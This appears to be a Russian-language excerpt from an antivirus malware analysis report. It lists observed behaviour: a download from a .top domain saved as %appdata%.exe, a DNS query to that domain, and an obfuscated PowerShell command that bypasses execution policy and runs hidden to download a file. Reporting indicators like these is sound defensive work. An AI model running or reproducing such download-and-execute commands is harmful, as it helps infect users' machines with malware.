Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowERSh^E^L^L^.^E^X^e -E^XE^c^U^ti^ON^P^OlICy B^y^Pa^sS ^-n^o^PR^O^Fi^L^E^ ^-WInDowS^ty^le ^h^iDD^EN ^(^ne^W-ob^jeCT^ ^sYSTeM.N^E^t^.^w^e^B^Clie^NT).Dow^Nl^OA^d^f^I^l^E^('http://...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /c "PowERSh^E^L^L^.^E^X^e -E^XE^c^U^ti^ON^P^OlICy B^y^Pa^sS ^-n^o^PR^O^Fi^L^E^ ^-WInDowS^ty^le ^h^iDD^EN ^(^ne^W-ob^jeCT^ ^sYSTeM.N^E^t^.^w^e^B^Clie^NT).Dow^Nl^OA^d^f^I^l^E^('http://...' (со скрытым окном)